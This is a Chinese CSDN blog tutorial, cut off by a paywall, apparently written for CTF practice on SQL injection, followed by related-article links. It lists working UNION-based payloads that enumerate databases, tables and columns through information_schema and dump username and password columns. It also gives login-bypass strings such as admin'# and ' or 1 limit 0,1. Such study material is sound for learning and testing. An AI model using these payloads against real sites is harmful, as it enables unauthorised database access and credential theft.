网络安全攻防——SQL注入

最新推荐文章于 2024-02-18 15:27:18 发布
最新推荐文章于 2024-02-18 15:27:18 发布
阅读量663 收藏 4
点赞数 1
分类专栏: 网络安全攻防&黑客/CTF 文章标签: sql注入 网络安全 盲注 二次注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zyqblog/article/details/116780346
版权

文章目录

0、常用查询

数据库名

# 查询所有数据库
?id=0' union select 1, group_concat(schema_name),3 from information_schema.schemata %23

表名

# 查询某一个数据库的所有表
?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where 
table_schema='数据库名' %23

# 用limit 来一个一个找
?id=-3' union select 1,1,table_name from information_schema.tables where table_schema=database() limit 0,1 %23

# 直接用group_concat来找出所有表名,查询当前数据库
?id=-3' union select 1,1,group_concat(table_name) from information_schema.tables where table_schema=database() %23

表结构

?id=-3' union select 1,1,group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.Columns where table_schema=database() and table_name='表名'  %23

某些情况下把表名字符串(不包括引号)通过转换成0x16进制,去掉单引号,前加0x

数据全查询

?id=0' union select 1,group_concat(username),group_concat(password) from users %23

1、or+limit全局查询

or 1 可以与任何形式组合成真。在查询中,用如下的语句来进行全局查找,可以一行一行的输入表中的内容

?id=1' or 1 limit 0,1 %23

在post登录情景下,如果知道用户名admin,则可以用admin'# 来闭合,当不知道用户名时,可以使用任何形式拼接or 1的方法实现闭合d' or 1 # ,也可以实现查询d' or 1 limit 0,1 #

2、联合查询基础

union之后是查询语句,查询的条数与数据库表的结构一致,所以需要通过order by准确判断出表有几栏。

  • 当查到的内容会显示在页面的占位符中时,union之前取假值,可以用负数或者and 1=2在登录情境下,可以用不正确的用户名,需要判断出每一栏在页面中显示的位置。
  • 假如页面中我们查询的内容并不是显示占位中,那显示结果可能隐藏在页面中没有显示出来,如当输入错误时候,页面才会显示出错误提示,这时我们需要让union前面的条件为真。

特别注意: 当查询字段是sql关键字时需要用单引号包裹。

3、bool盲注与爆破

问题:正确显示就显示固定字符,不正确不显示。

解决: 可以通过显示不显示来判断是否是正确的

查询数据库名

# 判断数据库名的长度=8,通过<9显示信息,<8不显示信息
?i
最低0.47元/天 解锁文章
孤旅青山迷情人
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
网络安全】面试中常见问题--sql注入
你在看屏幕的同时,屏幕也在注视着你
07-20 3936
渗透测试工程师面试sql注入篇问题汇总
网络攻防SQL注入攻击
MyCodeDream的专栏
06-13 1693
SQL注入攻击的根源是因为SQL规范的漏洞,但是,因为规范的长期存在以及使用,几乎已经不太可能去修改规范了,只能够从开发者本身去避免攻击,虽然SQL注入之前很严重,但现在相对控制的很好,这里仅仅作为一种学习的内容。 测试过程如下: 1:搭建PHP,mysql开发环境,可以详见我的另一篇博客自定义开发PHP环境 2:添加数据库,表,以及表内容。3:分别测试 万能密码,万能用户名
网络安全-SQL注入
码农成长记
10-31 1593
定义 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 根据相关技术原理,SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所致;后者主要是由于程序员对输入未进行细致地过滤,从而执行了
网络攻防入门---SQL注入攻击
濯君
12-28 488
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 比如这里原本是通过输入用户id来查询用户的first name, surname <?php if(isset($_GET['Submit'])){ // Retrieve data $i.
2021年,SQL注入死透了么?
m0_50180963的博客
03-18 1244
原创:小姐姐味道(微信公众号ID:xjjdog) 很长一段时间,我认为后端开发,在安全性方面最容易出问题的地方就在于SQL注入。通过 where 1=1这种魔幻的SQL写法,就可以很容易的对一个存在问题的系统进行攻击,以至于最终演进出sqlmap这样的神器存在。 后来的fastjson刷新了我的认知,这个框架也算是对互联网安全概念的一种推动。连不懂技术的老板,都知道fastjson快的要命,作为程序员安全理念就得到了一次提升。 为什么对sql注入情有独钟?因为开发人员和SQL打交道的地方太多了.
天津理工大学信息安全专业网络攻防实验3-Web攻击与防御
11-28
在本次实验中,主要目标是深入理解Web安全中的一个重要威胁——SQL注入,并掌握利用sqlmap工具进行POST注入攻击的方法。SQL注入是一种常见的黑客攻击手段,通过在Web应用的输入字段中插入恶意SQL代码,攻击者可以...
网络安全作业-by cumt梅苑杀手.docx
08-08
网络安全作业——cumt梅苑杀手.docx文档涵盖了多个网络安全领域的重要概念,主要集中在SQL注入(SQLi)、XML External Entity(XXE)攻击、Cross-Site Scripting(XSS)漏洞和上传漏洞的解决与防范。这些是网络攻防...
web渗透测试技巧(下)
10-12
本文深入探讨了Web渗透测试中几种常见的攻击手段——SQL注入和本地文件包含,并提供了具体的利用案例和防御策略。通过理解和应用这些技巧,不仅可以帮助测试人员发现Web应用程序中的安全漏洞,也能为开发者提供重要...
重庆交通大学网络安全实验报告.pdf
10-11
网络安全实验报告——基于Kali的Maltego信息收集与SQL注入渗透测试】 实验报告主要涵盖了两个关键领域:Maltego的信息收集和SQLmap的渗透测试。Maltego是一款强大的可视化链接分析工具,用于信息挖掘和关系图谱的...
攻防世界miss-01,杂项misc太湖杯
11-01
1. 网络安全基础知识:了解常见的攻击手段和防御策略,如SQL注入、XSS攻击、CSRF等。 2. 工具使用:熟悉各种网络安全工具,如Nmap进行端口扫描,Wireshark进行网络流量分析,Burp Suite进行Web应用渗透测试等。 3. ...
Web暴力破解及SQL注入
08-09
Web暴力破解及SQL注入 已知owasp服务器内的网站用户名为:gordonb 密码为6位,前三位为‘abc’后三位为数字,对其进行爆破得到正确的密码并验证。 使用SQLmap对该网站的前3个SQL注入案例进行SQL注入,将用户名和密码展示出一张表,实现拖库操作。
sql注入攻击常用语句总结
03-29
sql注入总结 语句精简 类型丰富 种类齐全 值得学习 欢迎借鉴
SQL注入攻击-网络安全攻防新焦点
11-13
一篇很不错的安全攻防技术文章,主要介绍SQL注入的原理,危害和如何有效防范。
网络安全必学SQL注入,SQL语句关键词,SQL注入攻击实例分享!!!
最新发布
logic1001的博客
02-18 1296
当找到某个变量关键词有 SQL 注入风险时,可以再根据调用链找到该存在注入风险的业务逻辑代码,查看参数来源是否安全、是否有配置SQL危险参数过滤的过滤器,最终确认是否存在SQL注入。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…针对SQL注入的攻击行为可描述为通过在用户可控参数中注入SQL语法,破坏原有SQL结构,达到编写程序时意料之外结果的攻击行为。
SQL注入攻击实战演练
Appleteachers的博客
04-20 861
今天要介绍的是SQL注入实验。SQL注入攻击的学习,我们更多的目的是为了学习攻击技术和防范策略,而不是刻意去攻击数据库。 首先我们先进入实验地址《SQL 注入》。 SQL注入是一种代码注入技术,过去常常用于攻击数据驱动性的应用,实质就是将恶意的SQL代码注入到特定字段用于实施拖库攻击等。SQL注入的成功必须借助应用程序的安全漏洞,例如用户输入没有经过正确地过滤(针对某些特定字符串)或者没有特别强调类型的时候,都容易造成异常地执行SQL语句。SQL注入是网站渗透中最常用的攻击技术,但是其实SQL注入可以用来攻
SQL注入研究
"小灰"的专栏
09-08 1913
请勿用于非法用途,本代码只是为了让广大ASP爱好者明白原理,防范于未然。Function bytes2BSTR(vIn)dim strReturndim i,ThisCharCode,NextCharCodestrReturn = ""For i = 1 To LenB(vIn)ThisCharCode = AscB(MidB(vIn,i,1))If ThisCharCode strReturn
重新学习MySQL数据库11:以Java的视角来聊聊SQL注入
Java技术江湖
01-17 1914
以Java的视角来聊聊SQL注入 转自 javatikuJava面试那些事儿2017-08-09 在大二就接触过sql注入,之前一直在学习windows逆向技术,认为web安全以后不是自己的从业方向,所以当时也就没有深入研究。工作多年来,本人也一直从事安全开发相关工作,随着Java的市场份额越来越重,在工作中接触Java的机会也越来越多,也是机缘巧合的契机,自己开始走向了偏 Java开...
网络安全--最简单的sql注入
nuoman_cheng的博客
11-10 1069
我们平常见到的输入框: 如果用户输入: 用户名:user1 or '1'='1' 密码   : passwd1 or '1'='1' 那么,SQl会产生为: select * from  ziliao  where  username=user1 or '1'='1'  and  password = passwd1 or '1'='1' 后面的条件就永远为真,就绕过去
SQL注入问题的研究与防护
m0_52341820的博客
04-14 7996
随着互联网的发展,Web应用程序得到了日益广泛的运用,与此同时黑客技术也得到了发展,Web应用程序的安全漏洞类型越来越多样化,所带来的安全隐患越多。SQL注入漏洞契机利用Web应用程序的安全漏洞进行SQL注入攻击达到绕过身份验证、窃取和破坏数据、伺机非法入侵等目的。本文围绕Web项目中的常见的SQL注入攻击的特点、原理并进行总结,提出在应用程序原有防御基础上使用输入验证、SQL Sever防御以及使用存储过程替代参数化查询相结合的形式构建出一种有效防范 SQL 注入攻击的思路和方法。测试结果......
SQL注入攻防:sqlmap工具详解
SQL注入是一种常见的网络安全威胁,攻击者通过在输入字段中插入恶意的SQL语句,试图获取未经授权的数据访问或控制数据库。SQLmap是应对这一问题的专业工具,它能帮助安全研究人员或渗透测试人员发现并利用潜在的SQL...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

孤旅青山迷情人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值